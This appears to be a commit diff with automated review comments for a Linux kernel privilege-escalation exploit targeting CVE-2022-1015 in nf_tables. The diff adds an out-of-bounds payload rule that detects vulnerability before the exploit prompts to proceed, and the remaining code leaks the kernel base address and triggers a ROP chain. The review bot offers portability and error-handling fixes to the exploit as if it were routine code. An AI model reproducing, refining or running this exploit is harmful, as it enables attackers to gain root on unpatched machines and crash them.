  • add accurate vuln detection w/o necessarily exploiting.

  • David committed 2 years ago
    72119065
    1 parent f3140ea9
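--- a/helpers.h
+++ b/helpers.h
@@ -9,6 +9,10 @@
 #pragma once
 #include <stdint.h>
 
+#define CLR_RED "\e[0;31m"
+#define CLR_GRN "\e[0;32m"
+#define CLR_RESET "\e[0m"
+
 enum nft_types {
  NFT_TYPE_TABLE = 0,
  NFT_TYPE_CHAIN,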
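Review bot: The `\e` escape used in the three CLR_* macros (new lines 12-14) is a GCC/Clang extension rather than ISO C, so `-Wpedantic` warns on it and other compilers may reject the header outright. The portable spelling is the octal escape, `#define CLR_RED "\033[0;31m"`, and likewise `"\033[0;32m"` and `"\033[0m"` for the other two. The sequences are also emitted unconditionally, so output redirected to a file or log will carry raw escape bytes; guarding on `isatty(STDOUT_FILENO)` at the use site avoids that.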
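--- a/make.sh
+++ b/make.sh
@@ -1,2 +0,0 @@
-musl-gcc -static -I/home/david/linux/linux/usr/include pwn.c helpers.c -lnftnl -lmnl -lcap -o pwn -DDEBUG
-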
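--- a/pwn.c
+++ b/pwn.c
@@ -484,6 +484,7 @@
  execve(new_argv[0], new_argv, envp);
  puts("Couldn't start unshare wrapper..");
  puts("Recompile the exploit with an appropriate unshare path.");
+ exit(EXIT_FAILURE);
  }
  if (strcmp("EXPLOIT", argv[1])) {
  puts("[-] Something went wrong...");
@@ -518,26 +519,26 @@
  
  if (create_base_chain_rule(nl, table_name, base_chain_name, NFPROTO_IPV4, NULL, &seq)) {
  perror("Failed creating base chain rule");
- puts("[+] Target is NOT vulnerable to CVE-2022-1015");
  exit(EXIT_FAILURE);
  }
+ 
  puts("[+] Created base chain rule");
- puts("[+] Target IS vulnerable to CVE-2022-1015");
- puts("[+] Type 'y' to try exploiting the target.");
- puts("!!!BEWARE: THIS IS LIKELY TO CAUSE A KERNEL PANIC!!!");
 
- char a[4] = {};
- read(0, a, 1);
+ // we need to make a rule first in order to replace it
+ // in our leaky rule creation. it's a bit of a hack but it works
+ // We can also use it to determine whether the system is vulnerable
+ // before actually exploiting.
 
- if (a[0] != 'y') {
- puts("Bye!");
- exit(EXIT_SUCCESS);
+ struct vuln_expr_params v;
+
+ // offset 0xca and len 0xff is OOB
+ if (calc_vuln_expr_params(&v, 0xca, 0x00, 0xff)) {
+ puts("[-] Something went horribly wrong...");
+ exit(EXIT_FAILURE);
  }
 
- // we need to make it first in order to replace it
- // it's a bit of a hack but it works
  struct nftnl_rule* aux_rule = build_rule(table_name, aux_chain_name, NFPROTO_IPV4, NULL);
- rule_add_immediate_verdict(aux_rule, NF_ACCEPT, NULL);
+ rule_add_payload(aux_rule, NFT_PAYLOAD_INNER_HEADER, 8, v.max_len, v.value);
  
  err = send_batch_request(
  nl,
@@ -547,11 +548,22 @@
  );
  
  if (err) {
- perror("Failed creating auxiliary chain rule");
+ puts(CLR_RED "[+] TARGET IS NOT VULNERABLE to CVE-2022-1015!" CLR_RESET);
  exit(EXIT_FAILURE);
  }
  
- puts("[+] Created auxilary chain's initial infoleak rule.");
+ puts("[+] Succesfully created rule with OOB nft_payload!");
+ puts(CLR_GRN "[+] TARGET IS VULNERABLE to CVE-2022-1015!" CLR_RESET);
+ puts("[+] Type 'y' to try exploiting the target.");
+ puts(CLR_RED "!!!BEWARE: THIS IS LIKELY TO CAUSE A KERNEL PANIC!!!" CLR_RESET);
+
+ char a[4] = {};
+ read(0, a, 1);
+ 
+ if (a[0] != 'y') {
+ puts("Bye!");
+ exit(EXIT_SUCCESS);
+ }
  
  #define SERVER_HOST "127.0.0.1"
  #define SERVER_PORT 9999
@@ -571,13 +583,16 @@
  uint64_t kernel_addr = 0xffffffff00000000 + leak + (LEAK_BASE_OFFSET & 0xff);
  uint64_t kernel_base = kernel_addr - LEAK_BASE_OFFSET;
 
- printf("[+] Kernel base @ 0x%.16lx\n", kernel_base);
 
+ // If the kernel base isn't aligned we should probably not continue.
  if((kernel_base & 0xfffff) != 0) {
  puts("[-] Leak failed.");
+ puts("[-] Try changing offsets / lengths / chain types.");
+ puts("[-] If all leaked bytes were ff, this is probably because of corrupted loopback state.. RIP");
  exit(EXIT_FAILURE);
  }
  
+ printf("[+] Kernel base @ 0x%.16lx\n", kernel_base);
  stop_listener(pid);
  struct unft_base_chain_param bp;
  bp.hook_num = NF_INET_LOCAL_IN;
@@ -598,3 +613,4 @@
  trigger_rop(nl, kernel_base, &server, err);
  after_rop();
 }
+ 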
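Review bot: Any non-zero return from send_batch_request() (new lines 550-552 in the section's third hunk) is now reported as `TARGET IS NOT VULNERABLE`, and the `perror` that used to print the reason was removed, so a permissions, netlink-transport or resource failure is indistinguishable from the patched-kernel case and produces a false negative with no diagnostic. Keep the errno next to the verdict, `perror("send_batch_request");` before the puts, so that unrelated failures are at least visible as such. The prompt on new line 561 ignores the `read()` return value; `if (read(0, a, 1) != 1 || a[0] != 'y')` makes EOF take the exit path explicitly instead of relying on the zero-initialised buffer. The string on new line 555 misspells "Succesfully". The enclosing function starts before the first hunk shown here, and the `%.16lx` retained on new line 595 should be `PRIx64` from <inttypes.h> to match `uint64_t` on non-LP64 targets.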